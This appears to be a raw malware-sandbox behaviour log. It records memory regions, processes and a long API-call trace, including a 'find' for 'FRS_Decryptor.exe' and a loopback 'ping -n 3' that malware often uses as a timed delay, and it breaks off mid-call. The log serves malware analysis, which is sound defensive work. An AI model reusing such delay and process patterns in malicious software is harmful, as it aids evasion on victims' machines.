Region: id = 6700 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6701 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 6702 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6703 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6704 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6705 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6706 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6707 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6708 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6709 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6710 start_va = 0x7ee70000 end_va = 0x7ef6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee70000" filename = "" Region: id = 6711 start_va = 0x7ef97000 end_va = 0x7ef99fff entry_point = 0x0 region_type = private name = "private_0x000000007ef97000" filename = "" Region: id = 6724 start_va = 0x970000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 6725 start_va = 0xb70000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 6726 start_va = 0x2a70000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 6727 start_va = 0x2ab0000 end_va = 0x2aeffff entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 6728 start_va = 0x73360000 end_va = 0x7340afff entry_point = 0x73360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 6729 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 6730 start_va = 0x7ee6d000 end_va = 0x7ee6ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee6d000" filename = "" Region: id = 6731 start_va = 0x7ef94000 end_va = 0x7ef96fff entry_point = 0x0 region_type = private name = "private_0x000000007ef94000" filename = "" Thread: id = 368 os_tid = 0x3dc Thread: id = 370 os_tid = 0x6b8 Thread: id = 371 os_tid = 0xbfc Thread: id = 372 os_tid = 0xb44 Process: id = "129" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x1026d000" os_pid = "0x7b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "127" os_parent_pid = "0x788" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6628 start_va = 0x730000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 6629 start_va = 0x750000 end_va = 0x751fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 6630 start_va = 0x760000 end_va = 0x76efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 6631 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 6632 start_va = 0x7b0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 6633 start_va = 0x7f0000 end_va = 0x7f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 6634 start_va = 0x800000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 6635 start_va = 0x810000 end_va = 0x811fff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 6636 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 6637 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6638 start_va = 0x7f900000 end_va = 0x7f922fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f900000" filename = "" Region: id = 6639 start_va = 0x7f924000 end_va = 0x7f924fff entry_point = 0x0 region_type = private name = "private_0x000000007f924000" filename = "" Region: id = 6640 start_va = 0x7f926000 end_va = 0x7f926fff entry_point = 0x0 region_type = private name = "private_0x000000007f926000" filename = "" Region: id = 6641 start_va = 0x7f92d000 end_va = 0x7f92ffff entry_point = 0x0 region_type = private name = "private_0x000000007f92d000" filename = "" Region: id = 6642 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6643 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6644 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6645 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6650 start_va = 0x8e0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 6651 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6652 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6653 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6712 start_va = 0x730000 end_va = 0x73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 6713 start_va = 0x740000 end_va = 0x743fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 6714 start_va = 0x750000 end_va = 0x753fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 6715 start_va = 0x820000 end_va = 0x89dfff entry_point = 0x820000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6716 start_va = 0xad0000 end_va = 0xbcffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 6717 start_va = 0xdb0000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 6718 start_va = 0x73410000 end_va = 0x7341efff entry_point = 0x73410000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 6719 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 6720 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6721 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6722 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6723 start_va = 0x7f800000 end_va = 0x7f8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f800000" filename = "" Thread: id = 369 os_tid = 0x6a8 Process: id = "130" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x18fca000" os_pid = "0x118" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6732 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 6733 start_va = 0xb40000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 6734 start_va = 0xb60000 end_va = 0xb61fff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 6735 start_va = 0xb70000 end_va = 0xb7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 6736 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 6737 start_va = 0xbc0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 6738 start_va = 0xc00000 end_va = 0xc03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 6739 start_va = 0xc10000 end_va = 0xc10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 6740 start_va = 0xc20000 end_va = 0xc21fff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 6741 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6742 start_va = 0x7ec10000 end_va = 0x7ec32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec10000" filename = "" Region: id = 6743 start_va = 0x7ec36000 end_va = 0x7ec36fff entry_point = 0x0 region_type = private name = "private_0x000000007ec36000" filename = "" Region: id = 6744 start_va = 0x7ec37000 end_va = 0x7ec37fff entry_point = 0x0 region_type = private name = "private_0x000000007ec37000" filename = "" Region: id = 6745 start_va = 0x7ec3d000 end_va = 0x7ec3ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec3d000" filename = "" Region: id = 6746 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6747 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6748 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6749 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6750 start_va = 0xdc0000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 6751 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6752 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6753 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6754 start_va = 0xb40000 end_va = 0xb4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 6755 start_va = 0xb50000 end_va = 0xb53fff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 6756 start_va = 0xc30000 end_va = 0xcadfff entry_point = 0xc30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6757 start_va = 0xe70000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 6758 start_va = 0x1080000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 6759 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 6760 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 6761 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6762 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6763 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6764 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6765 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6766 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6767 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6768 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6769 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6770 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6771 start_va = 0x7eb10000 end_va = 0x7ec0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb10000" filename = "" Region: id = 6772 start_va = 0xcb0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 6773 start_va = 0xcf0000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 6774 start_va = 0x7ec3a000 end_va = 0x7ec3cfff entry_point = 0x0 region_type = private name = "private_0x000000007ec3a000" filename = "" Region: id = 6775 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 6776 start_va = 0xb60000 end_va = 0xb62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 6777 start_va = 0xd30000 end_va = 0xd30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 6778 start_va = 0xd40000 end_va = 0xd42fff entry_point = 0xd40000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 6779 start_va = 0xd50000 end_va = 0xd8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 6780 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 6781 start_va = 0x7ec33000 end_va = 0x7ec35fff entry_point = 0x0 region_type = private name = "private_0x000000007ec33000" filename = "" Thread: id = 373 os_tid = 0x498 [0122.833] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0122.833] __set_app_type (_Type=0x1) [0122.833] __p__fmode () returned 0x76ea1768 [0122.833] __p__commode () returned 0x76ea176c [0122.833] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0122.833] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0122.833] SetThreadUILanguage (LangId=0x0) returned 0x409 [0122.835] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.835] _fileno (_File=0x76ea4c28) returned 1 [0122.835] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.835] GetFileType (hFile=0x28) returned 0x2 [0122.835] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfee18 | out: lpMode=0xbfee18) returned 0 [0122.835] GetLastError () returned 0x6 [0122.835] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed7c, nSize=0x50 | out: lpBuffer="䤐ç") returned 0x0 [0122.835] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0122.837] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xbfee34 | out: phkResult=0xbfee34*=0x88) returned 0x0 [0122.837] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xbfee28, lpData=0xbfee30, lpcbData=0xbfee2c*=0x4 | out: lpType=0xbfee28*=0x0, lpData=0xbfee30*=0x0, lpcbData=0xbfee2c*=0x4) returned 0x2 [0122.837] RegCloseKey (hKey=0x88) returned 0x0 [0122.837] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xbfedf8*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xbfee34 | out: ppResult=0xbfee34*=0xe7c368*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xe789d0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0122.837] FreeAddrInfoW (pAddrInfo=0xe7c368*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xe789d0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0122.837] IcmpCreateFile () returned 0xe76b48 [0122.840] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xe7c4d0 [0122.840] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xe85270 [0122.840] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xbfef30, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0122.841] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="竈è¿┗\x94䰨盪❋") returned 0x14 [0122.842] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.842] _fileno (_File=0x76ea4c28) returned 1 [0122.842] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.842] GetFileType (hFile=0x28) returned 0x2 [0122.842] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0122.842] GetLastError () returned 0x6 [0122.842] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿❋") returned 0x0 [0122.842] _fileno (_File=0x76ea4c28) returned 1 [0122.842] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0122.842] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.842] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xe87b00 [0122.842] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xe87b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0122.842] _fileno (_File=0x76ea4c28) returned 1 [0122.842] _write (in: _FileHandle=1, _Buf=0xe87b00*, _MaxCharCount=0x14 | out: _Buf=0xe87b00*) returned 20 [0122.842] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.842] _fileno (_File=0x76ea4c28) returned 1 [0122.842] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0122.842] LocalFree (hMem=0xe87b00) returned 0x0 [0122.842] LocalFree (hMem=0xe87ac8) returned 0x0 [0122.842] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xbfee28, nSize=0x0, Arguments=0xbfee24 | out: lpBuffer="竈è¿▪\x94䰨盪❚") returned 0x18 [0122.843] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.843] _fileno (_File=0x76ea4c28) returned 1 [0122.843] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.843] GetFileType (hFile=0x28) returned 0x2 [0122.843] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfedec | out: lpMode=0xbfedec) returned 0 [0122.843] GetLastError () returned 0x6 [0122.843] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfed50, nSize=0x50 | out: lpBuffer="¿❚") returned 0x0 [0122.843] _fileno (_File=0x76ea4c28) returned 1 [0122.843] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0122.843] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0122.843] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xe7c458 [0122.843] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xe7c458, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0122.843] _fileno (_File=0x76ea4c28) returned 1 [0122.843] _write (in: _FileHandle=1, _Buf=0xe7c458*, _MaxCharCount=0x18 | out: _Buf=0xe7c458*) returned 24 [0122.843] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.843] _fileno (_File=0x76ea4c28) returned 1 [0122.843] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0122.843] LocalFree (hMem=0xe7c458) returned 0x0 [0122.843] LocalFree (hMem=0xe87ac8) returned 0x0 [0122.843] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0122.843] IcmpSendEcho2Ex (in: IcmpHandle=0xe76b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe7c4d0, RequestSize=0x20, RequestOptions=0xbfeea4, ReplyBuffer=0xe85270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe85270) returned 0x1 [0122.844] InetNtopW (in: Family=2, pAddr=0xbfee94, pStringBuf=0xbfefbc, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0122.844] FormatMessageW (in: dwFlags=0x900, 